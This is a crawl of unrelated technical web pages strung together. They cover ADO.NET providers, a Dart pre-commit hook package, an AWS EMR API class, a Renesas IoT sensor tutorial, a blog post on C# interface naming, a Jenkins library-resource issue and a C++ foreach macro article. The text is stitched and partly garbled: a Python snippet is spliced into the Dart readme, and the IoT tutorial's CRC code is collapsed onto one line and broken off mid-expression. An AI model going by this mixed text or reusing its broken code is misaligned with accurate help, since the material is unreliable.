For the most part both the OleDb and SqlClient connection classes implement the same members and operations. As a result of the similarities in OleDb and SqlClient classes, if you learn to use one or the other, you can easily use its alternative provider counterpart. Two other important namespaces related to System.Data are System.Data.Common and System.Data.SqlTypes. The Common namespace defines classes for permissions, table column mappings, and some event argument types. The SqlTypes namespace defines native types for SQL Server. As a general rule, you will most often use the System.Data and System.Xml namespaces and one or the other of the provider namespaces, OleDb or SqlClient. I will be using the OleDb providers in this chapter because I can reasonably gamble on your having a copy (or being able to get one) of the Northwind database. For informational purposes, it is worth noting that most of the code in this chapter could easily be rewritten using classes in the SqlClient namespace, if you are using a newer version of Microsoft SQL Server. However, the OleDb classes represent the classes you will use for the greatest diversity of database providers.
https://flylib.com/books/en/1.489.1.118/1/
dart_pre_commit
A small collection of pre commit hooks to format and lint dart code
Features
- Provides three built in hooks to run on staged files
- Fix up imports (package/relative) and sort them
- Run dart format
- Run dart analyze
- Only processes staged files
- Automatically stages modified files again
- Fails if partially staged files had to be modified
- Can be used as binary or as library
- Integrates well with most git hook solutions
Installation
Simply add dart_pre_commit to your pubspec.yaml (preferably as a dev_dependency) and run dart pub get (or flutter pub get).
Usage
To make use of the hooks, you have to activate them first. This package only comes with the hook code itself, not with a way to integrate it with git as an actual hook. Here are a few examples of how to do so:
Using git_hooks
The first example uses the git_hooks package to activate the hook. Take the following steps to activate the hook:
- Add git_hooks as a dev_dependency to your project
- Run dart pub run git_hooks create to initialize and activate git hooks for your project
- Modify git_hooks.dart to look like the following:

import "dart:io";
import "package:dart_pre_commit/dart_pre_commit.dart";
import "package:git_hooks/git_hooks.dart";

void main(List<String> arguments) {
  final params = { Git.preCommit: _preCommit };
  change(arguments, params);
}

Future<bool> _preCommit() async {
  final hooks = await Hooks.create(); // adjust behaviour if necessary
  final result = await hooks(); // run activated hooks on staged files
  return result.isSuccess; // report the result
}

Using hanzo
The second example uses the hanzo package to activate the hook.
Take the following steps to activate the hook:
- Add hanzo as a dev_dependency to your project
- Run dart pub run hanzo install to initialize and activate git hooks for your project
- Create a file named ./tool/pre_commit.dart as follows:

import "dart:io";
import "package:dart_pre_commit/dart_pre_commit.dart";

Future<void> main() async {
  final hooks = await Hooks.create(); // adjust behaviour if necessary
  final result = await hooks(); // run activated hooks on staged files
  exitCode = result.isSuccess ? 0 : 1; // report the result
}

- Run dart pub run hanzo -i pre_commit
Without any 3rd party tools
The package also provides a script to run the hooks. You can check it out via dart pub run dart_pre_commit --help. To use it as a git hook, without any other tool, you have to create a script called pre-commit in .git/hooks as follows:
#!/bin/bash
exec dart pub run dart_pre_commit # Add extra options as needed
Documentation
The documentation is available at. A full example can be found at.
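The "only processes staged files" behavior these hooks build on comes straight from git: git diff --cached --name-only lists exactly what is staged. A language-agnostic sketch of that core loop in Python (the Dart specifics here are illustrative, not dart_pre_commit's actual implementation):

```python
import subprocess

def staged_dart_files(listing):
    """Filter a `git diff --cached --name-only` listing down to Dart sources."""
    return [f for f in listing.splitlines() if f.endswith('.dart')]

def run_hooks():
    # ask git for the staged files only
    out = subprocess.run(['git', 'diff', '--cached', '--name-only'],
                         capture_output=True, text=True, check=True).stdout
    for path in staged_dart_files(out):
        # a real hook would run `dart format` / `dart analyze` on `path`
        # and `git add` it again if the formatter modified it
        print('would check', path)

files = staged_dart_files('lib/a.dart\nREADME.md\ntool/b.dart\n')
```

Re-staging modified files (and failing on partially staged ones) is what keeps the commit and the formatter output consistent.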
https://pub.dev/documentation/dart_pre_commit/latest/
public class JobFlowDetail
The version of the AMI used to initialize Amazon EC2 instances in the job flow. For a list of AMI versions currently supported by Amazon ElasticMapReduce, go to AMI Versions Supported in Elastic MapReduce in the Amazon Elastic MapReduce Developer's Guide.
A list of the bootstrap actions run by the job flow.
Describes the execution status of the job flow.
Describes the Amazon EC2 instances of the job flow.
The job flow identifier.
The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
The location in Amazon S3 where log files for the job are stored.
The name of the job flow.
The IAM role that was specified when the job flow was launched. Amazon ElasticMapReduce will assume this role to work with AWS resources on your behalf.
A list of steps run by the job flow.
A list of strings set by third party software when the job flow is launched. If you are not using third party software to manage the job flow this value is empty.
Specifies whether the job flow is visible to all IAM users of the AWS account associated with the job flow. If this value is set to true, all IAM users of that AWS account can view and (if they have the proper policy permissions set) manage the job flow. If it is set to false, only the IAM user that created the job flow can view and manage it. This value can be changed using the SetVisibleToAllUsers action.
https://docs.aws.amazon.com/sdkfornet1/latest/apidocs/html/T_Amazon_ElasticMapReduce_Model_JobFlowDetail.htm
Click on Dashboard on the left side of the Renesas IoT Sandbox and reset your board. In the Real Time Events Log widget, you should see an event containing a processed air quality value after approximately 5 minutes.
In this step, you will set up a workflow to receive the temperature and humidity information from the board. Set up the following workflow:
Set the Custom trigger minutely interval to 2 and select All Users, as you did in Step 2. Replace the Base Python code with the following:

import MQTT

ENS210_ADDR = 0x43
mqtt_buffer = u''

def write_register(reg, data):
    global mqtt_buffer
    mqtt_buffer += u'3;2;0;3;unused;' + u''.join(map(unichr, [ENS210_ADDR, reg, data]))

def read_register(reg, num, tag_name):
    global mqtt_buffer
    mqtt_buffer += u'3;2;{};2;{};'.format(num, tag_name) + u''.join(map(unichr, [ENS210_ADDR, reg]))

write_register(0x21, 0x03)
MQTT.publish_event_to_client('s3a7', mqtt_buffer, 'latin1')
mqtt_buffer = u''
write_register(0x22, 0x03)
MQTT.publish_event_to_client('s3a7', mqtt_buffer, 'latin1')
mqtt_buffer = u''
read_register(0x30, 6, 'temp_and_humidity')
MQTT.publish_event_to_client('s3a7', mqtt_buffer, 'latin1')

Then click "Save and Activate". Click on Dashboard on the left side of the Renesas IoT Sandbox and reset your board. In the Real Time Events Log widget, you should see an event containing temperature and humidity data within 2 minutes.
# Compute the CRC-7 of 'val' (should only have 17 bits) def crc7(val): # Setup polynomial pol = CRC7POLY # Align polynomial with data pol = pol << (DATA7WIDTH-CRC7WIDTH-1) # Loop variable (indicates which bit to test, start with highest) bit = DATA7MSB; # Make room for CRC value val = val << CRC7WIDTH bit = bit << CRC7WIDTH pol = pol << CRC7WIDTH # Insert initial vector val |= CRC7IVEC # Apply division until all bits done while( bit & (DATA7MASK<<CRC7WIDTH) ): if( bit & val ): val ^= pol bit >>= 1 pol >>= 1 return val handt = IONode.get_input('in1')['event_data']['value'] out = {} t_val = handt[0] | (handt[1] << 8) | (handt[2] << 16) h_val = handt[3] | (handt[4] << 8) | (handt[5] << 16) t_data = t_val & 0xffff; t_valid = (t_val >> 16) & 0x1; t_crc = (t_val >> 17) & 0x7f; h_data = h_val & 0xffff; h_valid = (h_val >> 16) & 0x1; h_crc = (h_val >> 17) & 0x7f; print "t_data: {}, t_valid: {}, t_crc: {}, h_data: {}, h_valid: {}, h_crc: {}".format(t_data, t_valid, t_crc, h_data, h_valid, h_crc) if t_valid: t_payl = t_val & 0x1ffff; calc_t_crc = crc7(t_payl) if calc_t_crc == t_crc: out['temperature'] = round(float(t_data) / 64 - 273.15”. Click on Dashboard on the left side of the Renesas IoT Sandbox and reset your board. In the Real Time Events Log widget, you should see an event containing temperature and humidity after approximately 5 minutes. In this step, you will set up a workflow to send your location, temperature, humidity, and air quality data to the Learn IoT Community World Map.Set up the following workflow:”. Click on Dashboard on the left side of the Renesas IoT Sandbox, open the Learn IoT Community World Map, and reset your board. In the Real Time Events Log widget, you should see an event containing all of your sent data in approximately 5 minutes. Congrats, you've just learned how to send your board data to our IoT Community World Map. You have now finished this tutorial sequence, happy building!
http://learn.iotcommunity.io/t/howto-create-an-iot-community-world-map-with-location-air-quality-temperature-humidity/288
Why drop the I if you're going to just add an Impl?
I was perusing the TopShelf source code this morning, trying to track down a change in the hosting API, when I discovered that the TopShelf team has succumbed to the new drop the 'I' in interface names meme. It's new to the .NET scene anyway; the java guys have been doing it for a while, like all good new ideas in .NET that were not stolen from ruby anyway. If you are unfamiliar, the gist of the meme is that it is unnecessary to add the 'I' in front of an interface name because the consumer of the interface does not care that it is an interface, and the 'I' is a form of Hungarian notation that the civilized world has all agreed is a bad practice. So your..

public interface ISomeBehavior { }

..should be..

public interface SomeBehavior { }

And this makes a kind of sense. Where it breaks down is when you see a class that implements the interface named like this.

public interface SomeBehavior { }
public class SomeBehaviorImpl : SomeBehavior { }

I am not quite sure what the benefit is in moving the 'I' from the interface to the implementation and adding three characters. What have I gained beyond adding to my carpal tunnel? Does my consuming code care somehow that this is an implementation of some 'I'-less interface? At some fundamental level, an interface is a contract. That contract states that the class that implements the interface provides a specific usable set of methods and properties. Another way to look at this is that the interface is a behavior. Consider the IDisposable interface provided by .NET. There is no DisposableImpl floating around. The interface describes a characteristic of the implementing type, that it behaves like a disposable thing. Your interfaces need not be in a one-to-one relationship with the implementing class. In fact, your classes can implement multiple SRP friendly interfaces. To quote Brett L.
Schuchert:

class Manager : public ISing, public IDance {}

;-) Keep your interfaces clean, let the managers violate all they want.

So, I am sure you are making an angry face at my blog right now, thinking, "Ok, mister smarty pants, what should I do then?" To that I say: I like the 'I', but I use it so that it reads like a declaration.

public interface IReadFiles { }
public interface ICalculateRates { }
public interface ISingAndDance { //OMG SRP VIOLATION! }

And you may find that as preposterous as I find the 'I'/'Impl' meme. But that's cool. To each his own, but that damn 'Impl' stuff is not mine.

This post brought to you by Negatron.

About Author
I am a passionate engineer with an interest in shipping quality software, building strong collaborative teams and continuous improvement of my skills, team and the product.
https://iamnotmyself.com/2011/04/26/why-drop-the-i-if-youre-going-to-just-add-an-impl/
- Type: Bug - Status: Resolved (View Workflow) - Priority: Minor - Resolution: Not A Defect - Component/s: workflow-cps-global-lib-plugin - Labels: - Environment:Jenkins ver 2.46.3 Pipeline: Shared Groovy Libraries ver 2.8 - Similar Issues: Hi there, I love the idea of using shared libraries! I've been trying to use it - quite successfully - until I started using resources. I have a directory layout similar to the one described in the documentation. Inside my library I have a class rendering an html template (would be Bar.groovy). This template is in the resource directory (would be bar.json). Unfortunately, I just can't manage to retrieve the path of the resource using: this.class.getResource("org/foo/bar.json") This always returns "null" when executed on a Jenkins server while it does return the correct file path when running locally on my machine. However, the following works like a charm: def request = libraryResource 'org/foo/bar.json' Is this a bug or am I doing something wrong? Any help much appreciated I mean you can try src/the/pkg/resource.json and the.pkg.SomeClass.getResource('resource.json') may work. But the tested and recommended way to package resources is libraryResource. It's a pity libraryResource() is shy about selecting the currently active implicit library's resource. Instead I get an error, hudson.AbortException: Library resource com/COMPANY/FILE.EXT ambiguous among libraries [VER1, VER2] If the pipeline plugin has a way to select the innermost folder's implicit library, it could apply the same algorithm (or stick to the active version) when resolving the library resource. Ilguiz Latypov’s comment is unrelated to the reported issue, but at any rate: perhaps you are selecting distinct names for the “same” library, which is not wise since it would result in both versions of the library being loaded in one build. Please use the users’ list for advice. I also get into this problem. 
In my scenario I don't know if the resource file exists and want to get a null value if it does not. This is the exact behavior of this.class.getResource("org/foo/bar.json"), which always returns null when executed in a Jenkins pipeline, even when the file exists. With libraryResource there will be an exception, which is not what I need. It is possible to catch the exception, but it will show up as an error in Grafana, so I need to avoid the exception. Is there a way with libraryResource to return null if the resource does not exist?
Ok. Let's drop it. If I am the only one affected it's not worth it. Thanks Jesse Glick. Cheers,
https://issues.jenkins-ci.org/browse/JENKINS-45041?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel
CC-MAIN-2019-35
refinedweb
439
58.69
How do I go about encoding an image to base64? I would like to store images in a database using this method. I have successfully converted a base64 string to an image and am using it in my project. Most of the information I have found works with strings, like the following example:

byte[] bytesToEncode = Encoding.UTF8.GetBytes(inputText);
string encodedText = Convert.ToBase64String(bytesToEncode);

This is simple enough, but what do I do with an image? This is how I am loading my image:

byte[] b64_bytes = System.Convert.FromBase64String(b64_string);
tex = new Texture2D(1, 1);
tex.LoadImage(b64_bytes);

Any help will be hugely appreciated. Thank you. Oh, I am working in C#.

Answer by kamgru123 · May 22, 2014 at 11:29 AM

EDIT: Apparently you can't serialize Texture2D (which I didn't know). But there's an easier solution: Texture2D.EncodeToPNG(), which returns a byte array.

Texture2D mytexture;
byte[] bytes;
bytes = mytexture.EncodeToPNG();

The following text is wrong. Don't use it :P

You could use BinaryFormatter to serialize it to bytes and then encode it.

using System.Runtime.Serialization.Formatters.Binary;

byte[] bytes;
using (MemoryStream ms = new MemoryStream())
{
    BinaryFormatter bf = new BinaryFormatter();
    bf.Serialize(ms, tex);
    bytes = ms.ToArray();
}
string enc = Convert.ToBase64String(bytes);

Hi Kamgru, thanks for your quick reply! I'm getting this error message though: "SerializationException: Type UnityEngine.Texture2D is not marked as Serializable."

Sweet! Thanks man. Works!

Hi, how did you solve the serialisation problem?

The serialization problem can't be solved, because Texture2D can't be serialized by any .NET serialization method. You should use EncodeToPNG and Convert.ToBase64String just like the answer suggests. Base64 is just a way to encode any binary data as printable text.

Hello, can you please do the same in JS? I'm trying to upload an image to a database but I'm not good at C#. Thanks!
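Stepping outside Unity for a moment: the core of the answer above is just base64-encoding raw bytes and decoding them back. A minimal, framework-free sketch of that round trip in Python (the byte string is a made-up placeholder standing in for real PNG data):

```python
import base64

# Placeholder binary payload standing in for EncodeToPNG() output.
png_bytes = b"\x89PNG\r\n\x1a\nfake-image-data"

# Encode: raw bytes -> base64 text, safe to store in a text column.
b64_string = base64.b64encode(png_bytes).decode("ascii")

# Decode: base64 text -> the original bytes, ready to load as an image again.
restored = base64.b64decode(b64_string)
assert restored == png_bytes
```

The same two steps map onto Convert.ToBase64String and Convert.FromBase64String in C#.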
Answer by BytesCrafter · Aug 09, 2016 at 09:01 AM

public RawImage prevUserPhoto; // This must not be null! Put a texture here.
public RawImage newUserPhoto;  // Leave this null. This is where the decoded texture goes.

// To load an image saved in PlayerPrefs as a string:
Texture2D newPhoto = new Texture2D(1, 1);
newPhoto.LoadImage(Convert.FromBase64String(PlayerPrefs.GetString("PhotoSaved")));
newPhoto.Apply();
newUserPhoto.texture = newPhoto;

// To save an image from a Texture2D, which must be readable and in RGBA32 format:
string stringData = Convert.ToBase64String(((Texture2D)prevUserPhoto.texture).EncodeToJPG());
PlayerPrefs.SetString("PhotoSaved", stringData);
https://answers.unity.com/questions/712673/how-to-encode-an-image-to-a-base64-string.html
pub_release 3.0.0

pub_release: ^3.0.0

Use this package as an executable

Install it: you can install the package from the command line:

$ dart pub global activate pub_release

Use it: the package has the following executables:

$ github_release
$ github_workflow_release
$ pub_release

Use this package as a library

Depend on it: run this command with Dart:

$ dart pub add pub_release

This will add a line like this to your package's pubspec.yaml (and run an implicit dart pub get):

dependencies:
  pub_release: ^3.0.0

Alternatively, your editor might support dart pub get. Check the docs for your editor to learn more.

Import it: now in your Dart code, you can use:

import 'package:pub_release/pub_release.dart';
https://pub.dev/packages/pub_release/versions/3.0.0/install
Unity automatically defines how scripts compile to managed assemblies. Typically, compilation times in the Unity Editor for iterative script changes increase as you add more scripts to the Project. Use an assembly definition file to define your own managed assemblies based upon scripts inside a folder. To do this, separate Project scripts into multiple assemblies with well-defined dependencies in order to ensure that only required assemblies are rebuilt when making changes in a script. This reduces compilation time.

Think of each managed assembly as a single library within the Unity Project. Figure 1 above illustrates how to split the Project scripts into several assemblies. Changing only scripts in Main.dll causes none of the other assemblies to recompile. Since Main.dll contains fewer scripts, it also compiles faster than Assembly-CSharp.dll. Similarly, script changes in only Stuff.dll cause Main.dll and Stuff.dll to recompile.

Assembly definition files are Asset files that you create by going > Assembly Definition. They have the extension .asmdef. Add an assembly definition file to a folder in a Unity Project to compile all the scripts in the folder into an assembly. Set the name of the assembly in the Inspector.

Note: The name of the folder in which the assembly definition file resides and the filename of the assembly definition file have no effect on the name of the assembly.

Add references to other assembly definition files in the Project using the Inspector too. To view the Inspector, click your Assembly Definition file and it should appear.
To add a reference, click the + icon under the References section and choose your file. Unity uses the references to compile the assemblies and also defines the dependencies between the assemblies.

To mark the assembly for testing, enable Test Assemblies in the Inspector. This adds references to nunit.framework.dll and UnityEngine.TestRunner.dll in the Assembly Definition file. Marking an assembly for testing makes sure that:

- Predefined assemblies (Assembly-CSharp.dll etc.) do not automatically reference Assembly Definition Files flagged for testing.
- The assembly is not included in a normal build. To include the assemblies in a player build, use BuildOptions.IncludeTestAssemblies in your building script. Note that this only includes the assemblies in your build and does not execute any tests.

Note: If you use the unsafe keyword in a script inside an assembly, you must enable the Allow 'unsafe' Code option in the Inspector. This passes the /unsafe option to the C# compiler when compiling the assembly.

You set the platform compatibility for the assembly definition files in the Inspector. You have the option to exclude or include specific platforms.

Having multiple assembly definition files (extension: .asmdef) inside a folder hierarchy causes each script to be added to the assembly definition file with the shortest path distance.

Example: If you have an Assets/ExampleFolder/MyLibrary.asmdef file, any script in the Assets > ExampleFolder > ExampleFolder2 folder will be compiled into the assembly defined by Assets/ExampleFolder/MyLibrary.asmdef.

Note: The assembly definition files are not assembly build files. They do not support conditional build rules typically found in build systems. This is also the reason why the assembly definition files do not support setting of preprocessor directives (defines), as those are static at all times.
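The "shortest path distance" rule can be illustrated with a small script that picks, for a given source file, the assembly definition whose folder is the nearest ancestor. This is only a sketch of the stated rule (my own illustration, not Unity's actual implementation):

```python
import posixpath

def owning_asmdef(script_path, asmdef_paths):
    """Return the .asmdef whose folder is the deepest ancestor of the script."""
    script_dir = posixpath.dirname(script_path)
    best = None
    for asmdef in asmdef_paths:
        folder = posixpath.dirname(asmdef)
        # The asmdef applies if the script sits in its folder or a subfolder.
        if (script_dir + "/").startswith(folder + "/"):
            # Keep the deepest (longest-path) matching folder.
            if best is None or len(folder) > len(posixpath.dirname(best)):
                best = asmdef
    return best

print(owning_asmdef(
    "Assets/ExampleFolder/ExampleFolder2/Script.cs",
    ["Assets/ExampleFolder/MyLibrary.asmdef"],
))  # Assets/ExampleFolder/MyLibrary.asmdef
```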
In the UnityEditor.Compilation namespace there is a static CompilationPipeline class that you use to retrieve information about assembly definition files and all assemblies built by Unity.

Assembly definition files are JSON files. They have the following fields. Do not use the includePlatforms and excludePlatforms fields in the same assembly definition file. Retrieve the platform names by using CompilationPipeline.GetAssemblyDefinitionPlatforms.

MyLibrary.asmdef

{
    "name": "MyLibrary",
    "references": [ "Utility" ],
    "includePlatforms": ["Android", "iOS"]
}

MyLibrary2.asmdef

{
    "name": "MyLibrary2",
    "references": [ "Utility" ],
    "excludePlatforms": ["WebGL"]
}

2018–03–07 Page published with limited editorial review
New feature in 2017.3
Custom Script Assemblies updated in 2018.1
https://docs.unity3d.com/Manual/ScriptCompilationAssemblyDefinitionFiles.html
Support Python 2 with Cython

Summary

Many popular Python packages are dropping support for Python 2 next month. This will be painful for several large institutions. Cython can provide a temporary fix by letting us compile a Python 3 codebase into something usable by Python 2 in many cases. It's not clear if we should do this, but it's an interesting and little known feature of Cython.

Background: Dropping Python 2 Might be Harder than we Expect

Many major numeric Python packages are dropping support for Python 2 at the end of this year. This includes packages like Numpy, Pandas, and Scikit-Learn. Jupyter already dropped Python 2 earlier this year. For most developers in the ecosystem this isn't a problem. Most of our packages are Python-3 compatible and we've learned how to switch libraries. However, for larger companies or government organizations it's often far harder to switch. The PyCon 2017 keynote by Lisa Guo and Hui Ding from Instagram gives a good look into why this can be challenging for large production codebases and also gives a good example of someone successfully navigating this transition.

It will be interesting to see what happens when Numpy, Pandas, and Scikit-Learn start publishing Python-3 only releases. We may uncover a lot of pain within larger institutions. In that case, what should we do? (Although, to be fair, the data science stack tends to get used more often in isolated user environments, which tend to be more amenable to making the Python 2-3 switch than web-services production codebases.)

Cython

The Cython compiler provides a possible solution that I don't hear discussed very often, so I thought I'd cover it briefly. Let's see an example…

Example

Here we show a small Python project that uses Python 3 language features. (source code here)

py32test$ tree .
.
├── py32test
│   ├── core.py
│   └── __init__.py
└── setup.py

1 directory, 3 files

# py32test/core.py
def inc(x: int) -> int:  # Uses typing annotations
    return x + 1

def greet(name: str) -> str:
    return f'Hello, {name}!'  # Uses format strings

# py32test/__init__.py
from .core import inc, greet

We see that this code uses both typing annotations and format strings, two language features that are well-loved by Python-3 enthusiasts, and entirely inaccessible if you want to continue supporting Python-2 users.

We also show the setup.py script, which includes a bit of Cython code if we're running under Python 2.

# setup.py
import os
from setuptools import setup, find_packages
import sys

if sys.version_info[0] == 2:
    from Cython.Build import cythonize
    kwargs = {'ext_modules': cythonize(os.path.join("py32test", "*.py"),
                                       language_level='3')}
else:
    kwargs = {}

setup(
    name='py32test',
    version='1.0.0',
    packages=find_packages(),
    **kwargs
)

This package works fine in Python 2:

>>> import sys
>>> sys.version_info
sys.version_info(major=2, minor=7, micro=14, releaselevel='final', serial=0)
>>> import py32test
>>> py32test.inc(100)
101
>>> py32test.greet(u'user')
u'Hello, user!'

In general things seem to work fine. There are a couple of gotchas though.

Potential problems

We can't use any libraries that are Python 3 only, like asyncio.

Semantics may differ slightly; for example I was surprised (though pleased) to see the following behavior:

>>> py32test.greet('user')  # <<--- note that I'm sending a str, not unicode object
TypeError: Argument 'name' has incorrect type (expected unicode, got str)

I suspect that this is tunable with a keyword parameter somewhere in Cython. More generally this is a warning that we would need to be careful because semantics may differ slightly between Cython and CPython.

Introspection becomes difficult. Tools like pdb, getting frames and stack traces, and so forth will probably not be as easy when going through Cython.
Python 2 users would have to go through a compilation step to get development versions. More Python 2 users will probably just wait for proper releases or will install compilers locally.

Moved imports like "from collections.abc import Mapping" are not supported, though presumably changes like this could be baked into Cython in the future.

So this would probably take a bit of work to make clean, but fortunately most of this work wouldn't affect the project's development day-to-day.

Should we do this?

However, as someone who maintains a sizable Python-2 compatible project that is used by large institutions, and whose livelihood depends a bit on continued uptake, I'll admit that I'm hesitant to jump onto the Python 3 Statement. For me personally, seeing Cython as an option to provide continued support makes me much more comfortable with dropping Python 2.
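One common workaround for the moved-imports problem (a general 2/3 compatibility idiom, not something from this post or specific to Cython) is a guarded import:

```python
try:
    from collections.abc import Mapping  # Python 3.3+ location
except ImportError:
    from collections import Mapping      # Python 2 fallback

# Either way, the name Mapping is now usable.
assert isinstance({}, Mapping)
assert not isinstance([], Mapping)
```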
https://matthewrocklin.com/blog/work/2018/11/28/python-2-and-cython
How to get a list of relative primes for a given number? Is there any direct Sage function?

This is my custom function to get the list of relative primes:

def getRelativePrimeList(n):
    L = []
    for i in range(1, n):
        if gcd(i, n) == 1:
            L.append(i)
    return L

Asked: 2019-02-02 08:25:02 -0500
Seen: 579 times
Last updated: Feb 03 '19
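Outside of Sage, the same list can be built in plain Python with math.gcd; a sketch equivalent to the custom function above (the function name is my own):

```python
from math import gcd

def relative_primes(n):
    """Integers in [1, n) that are coprime to n."""
    return [i for i in range(1, n) if gcd(i, n) == 1]

print(relative_primes(10))  # [1, 3, 7, 9]
```

As a cross-check, Sage's euler_phi(n) (Euler's totient) gives the count of such integers, so len(relative_primes(n)) should equal euler_phi(n).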
https://ask.sagemath.org/question/45274/how-to-get-list-of-relative-primes-for-a-given-number/?sort=oldest
When I run my code I receive the following error:

Fatal error: Call to a member function fetch() on a non-object in C:\Program Files\EasyPHP-5.3.8.0\www\Practice\staff.php on line 20

The code that causes the error is:

<?php
require_once "db_connect.php";
$dbh = db_connect();
$dbh->exec("CREATE TABLE Staff(
    UserId int NOT NULL AUTO_INCREMENT,
    PRIMARY KEY(UserId),
    Username varchar(65) NOT NULL,
    Password varchar(65) NOT NULL
)");
$dbh->exec("INSERT INTO Staff (UserId, Username, Password) VALUES (0000, 'Ben', 'Password')");
$sql = "SELECT * FROM Staff";
$stmt = $dbh->query($sql);
$result = $stmt->fetch(PDO::FETCH_ASSOC);
foreach($result as $key=>$val){
    echo "$val";
}
?>

The files also included are:

db_connect.php

<?php
function db_connect()
{
    include 'db_connection.inc';
    $dbh = new PDO("mysql:host=127.0.0.1;$database", $user, $password);
    return ($dbh);
}
?>

and:

db_connection.inc

<?php
$host = 'mysql:host=127.0.0.1;';
$user = 'root';
$password = 'mysql';
$database = 'library_db';
?>

I know the error states what is wrong, but I am not sure which PDO fetch command I should be using or if there is anything else I am doing wrong. What I want is for it to print out the values of the record in the Staff table. Any help is appreciated, thanks.
https://www.daniweb.com/programming/web-development/threads/387728/error-dealing-with-pdo-fetch
Unlike the newer languages, 'C' and 'C++' do not have a built-in foreach operation. Looping over containers is one of the most common operations, and a foreach simplifies writing and reading of code. Here, a simple approach is suggested to avail this facility in C++.

If you search the net, you will find long-winded discussions on how to implement this facility using complex macros, conditional operators ?:, multi-line macro definitions, code having dependency on STL or boost or other libraries, preprocessor programs, convoluted expressions for type safety etc.

What I present here uses three lines of macros that you need to place in your headers; then implement an interface and enjoy a cross-platform solution with type safety. Simplicity has been the prime goal.

Take a look at the following (desired) program fragments:

#include "files.hpp"

typedef const char *CSTR;
extern void find_replace(CSTR filename, CSTR from, CSTR to);

void change()
{
    Files files("*.htm");
    foreach(files)
    {
        find_replace(files.current(), "(c) 2005", "(c) 2006");
    }
}

and..

void bill()
{
    Clients clients;
    Invoices invoices;
    Services services;
    foreach(clients)
    {
        cout << "Client: " << clients.current().name() << endl;
        invoices = clients.current();
        foreach(invoices)
        {
            cout << "Invoice #: " << invoices.current().number() << endl;
            services = invoices.current();
            foreach(services)
            {
                cout << services.current() << endl;
            }
        }
    }
}

Note that in each of these cases, there are no iterators; it is not known (totally encapsulated) whether these are STL containers or not! Thus, we want to achieve two goals at the same time: mainly, simplicity in writing the code; and secondly, information hiding - so that the implementation (STL containers or not) does not dictate the use. Well, in these examples, some of the 'containers' are STL compliant and some are not.
This method allows you to achieve the same consistent usage nevertheless; without losing STL's efficiency, generality, and extensibility wherever you can; while keeping the interface utterly simple. Correctly speaking, I should say, there are no open, 'visible' iterators!

Looping often involves two types of containers: those holding simple (POD - plain old data: ints, doubles, chars) types and those holding abstract data types (objects of some class).

Take a look at the following function, taken from actual usage. Lots of people write like this, so this would be considered 'normal'.

void bill()
{
    Client client;
    // Loop over the clients
    for(Client::const_iterator ri = client.begin(); ri != client.end(); ++ri)
    {
        cout << (*ri).name() << endl;
        // Loop over the Invoices
        for(Invoices::const_iterator fi = (*ri).begin(); fi != (*ri).end(); ++fi)
        {
            cout << "Invoice #:" << (*fi).number() << endl;
            // Loop over the Services
            for(Services::const_iterator si = (*fi).begin(); si != (*fi).end(); ++si)
                cout << (*si) << endl;
        }
        cout << endl;
    }
}

In case it is needed to add namespace specifiers like 'Projectname::Client::const_iterator' and 'std::cout', 'std::endl' everywhere, you can imagine the reading excitement this is going to cause!

What I found utterly unacceptable for looping over object containers, as seen from this routine, was declaring an iterator every time merely for looping, and having to type things like (*ri).number().

Do you want to express the intent more clearly, type less and make it more maintainable? Tired of inventing new names for the iterators every time? Then recheck the foreach based version above. The formula for clearer code is achieved by combining the container with the iteration capabilities and encapsulating it as a single class.
The foreach (described later) works for any class having the following member functions:

class Cont
{
public:
    ...
    bool first();
    bool next();
    T current();   // T is the type of whatever that is contained herein
    // optional:
    T & operator()();              // Reference, hence good for mutables
    T & operator[](size_t index);  // Sometimes useful..
protected:
    ...
};

I started using this pattern before the STL surfaced, hence the names resemble the older iteration style. For STL based containers (or compatible - things made to behave like STL containers), this is equally simple to achieve:

template <class T>
class Container : public vector<T>
{
protected:
    typename Container::iterator it;  // 'typename' and 'this->' added for conforming compilers
public:
    // Container(){}
    // ~Container(){}
    bool first()   { it = this->begin(); return it != this->end(); }
    bool next()    { ++it; return it != this->end(); }
    T current()    { return *it; }
    ...

This is an example of a class holding objects of type 'T' in a vector. It could really be any of the other STL containers, suitable for the application at hand. The first() and next() are defined in terms of begin() and end(). Note how current() provides access to the desired contained object. Also note the use of ++it, as it++ would mean something quite different. All such traps are hidden; the users see only foreach.

For other (non STL based) classes, first() positions to the first object, and next() to the next. Both return false if that can't be done. A surprising number of other objects will readily yield to this: files, configuration entries, fields in an HTML form, DBMS tables etc., where you would otherwise have to build code to make them STL iteration compliant, just to unify the looping.
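For comparison only (my own sketch, not from the article): the same first()/next()/current() protocol rendered in Python, where a generator plays the role the foreach macro plays in C++:

```python
class Container:
    """Internal-iterator container mirroring the C++ first/next/current interface."""
    def __init__(self, items):
        self._items = list(items)
        self._i = 0

    def first(self):
        # Position on the first element; report whether one exists.
        self._i = 0
        return self._i < len(self._items)

    def next(self):
        # Advance; report whether an element remains.
        self._i += 1
        return self._i < len(self._items)

    def current(self):
        return self._items[self._i]

def foreach(c):
    """Drive any object exposing first/next/current, like the C++ macro does."""
    ok = c.first()
    while ok:
        yield c.current()
        ok = c.next()

print(list(foreach(Container([1, 2, 3]))))  # [1, 2, 3]
```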
The foreach is achieved by using the following macros:

#define JOIN2(a,b) a##b
#define JOIN(a,b) JOIN2(a,b)
#define foreach(a) for(bool JOIN(flag,__LINE__)=a.first(); JOIN(flag,__LINE__); JOIN(flag,__LINE__)=a.next())

Contrary to the common macro naming conventions, I have left foreach in lower case as it comes out as a true single-line for statement and avoids all possible problems with similar macros regarding dangling ifs, braces, etc. Simple, huh?

So, to recapitulate, this foreach takes in any 'container' object with first() and next() defined for it, and provides access to each element using current(). Access to mutable objects can be provided using the operator().

Every time it is used, my foreach creates a new bool flag variable, unique because it uses the current source line number as part of its name. This flag is never used again, so the actual name does not matter. It just needs to be unique, every time. According to the new standard, it will be forgotten when the scope of the for is over. Type safety is achieved as there is a separate class for each type of object container; the compiler does not need to know anything special about the objects being iterated over.

My STL version as shown evaluates end() once in first() and then again in next(). Change it if you have problems with that implementation. I use a template container version using direct STL containers and have not encountered a problem yet. For other things like 'Files' above, your implementations of first() and next() will depend upon whether you are using DOS, Win32 or Linux - all nicely hidden by the implementation.

My understanding of STL is close to minimal; I just am sold on its efficiency. So, I use it whenever the readability does not suffer. I can always buy a faster computer, can't put in the readability later.

Quite often, it makes sense to hold a copy of the contained item within the envelope, and use it as the 'current' value.
Customers cust;
foreach(cust)
{
    cout << cust.name << "\t" << cust.phone << endl;
}

